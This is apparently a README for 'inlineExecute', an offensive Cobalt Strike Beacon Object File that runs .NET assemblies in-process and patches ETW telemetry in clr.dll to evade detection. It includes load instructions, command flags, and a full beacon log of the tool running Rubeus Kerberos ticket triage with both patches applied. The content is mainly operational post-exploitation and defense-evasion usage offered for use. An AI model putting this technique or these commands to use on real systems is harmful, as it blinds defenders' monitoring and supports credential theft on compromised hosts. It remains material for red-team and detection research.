inlineExecute is Cobalt Strike BOF that executes a .NET assembly in the current process (rather than spawning a sacrificial process with execute-assembly).
It stands as a POC, and as a boilerplate to experiment with novel techniques in the future.
Currently, it implements a novel ETW bypass technique: Provider Handle Patching. It is documented in my blog - A Stealthier Reflective Loading.
The Provider Handle Patching technique prevents ETW telemetry from being generated by userland hooks in clr.dll.
Unlike traditional ETW patching techniques. This does not modify memory protections, and does not require suspicious WinAPIs like WriteProcessMemory, NTWriteVirtualMemory, VirtualProtect, NtProtectVirtualMemory.
Load inlineExecute.cna from Cobalt Strike -> Script Manager -> Load. Ensure that inlineExecute.o and inlineExecute.cna are in the same directory.
beacon> inlineExecute
[+] Usage: inlineExecute [-etwH] [-etwB] [-verbose] <filepath> <args>The -etwH and -etwB flags patches ETW via the Provider Handle Patching and Subscriber Bit Patching technique respectively. They can be used together or individually.
inlineExecute -etwH -etwB /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
The -verbose flag outputs debugging information.
inlineExecute -verbose -etwB /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
Example usage with Rubeus.exe triage.
[12/02 22:26:17] beacon> inlineExecute -etwB -etwH -verbose /home/kali/Ghostpack-CompiledBinaries/Rubeus.exe triage
[12/02 22:26:17] [+] Executing: /home/kali/Ghostpack-CompiledBinaries/Rubeus.exe
[12/02 22:26:17] [+] Arguments: triage
[12/02 22:26:17] [+] host called home, sent: 461058 bytes
[12/02 22:26:17] [+] received output:
[+] Runtime info obtained
[12/02 22:26:17] [+] received output:
[+] Runtime is loadable
[12/02 22:26:17] [+] received output:
[+] ICorRuntimeHost obtained
[12/02 22:26:17] [+] received output:
[+] CLR started successfully
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeHandle address: 00007FFEA4140930
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeHandle value: 7310c0
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeHandle patched: 1
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeEnableBits address: 00007FFEA41311C0
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeEnableBits value: ffffffff
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeEnableBits patched: 0
[12/02 22:26:17] [+] received output:
[+] clr.dll loaded: 00007FFEA36A0000
[12/02 22:26:17] [+] received output:
[+] Anonymous pipe created
[12/02 22:26:17] [+] received output:
[+] Console created and hidden
[12/02 22:26:17] [+] received output:
[+] Redirected stdout/stderr to pipe
[12/02 22:26:17] [+] received output:
[+] AppDomain Created
[12/02 22:26:17] [+] received output:
[+] Assembly Loaded
[12/02 22:26:17] [+] received output:
[+] Assembly executed, reading output...
[12/02 22:26:17] [+] received output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
Action: Triage Kerberos Tickets (Current User)
[*] Current LUID : 0x1e563
---------------------------------------
| LUID | UserName | Service | EndTime |
---------------------------------------
---------------------------------------
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeHandle value restored: 7310c0
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeEnableBits value restored: ffffffff
[12/02 22:26:17] [+] received output:
[+] Done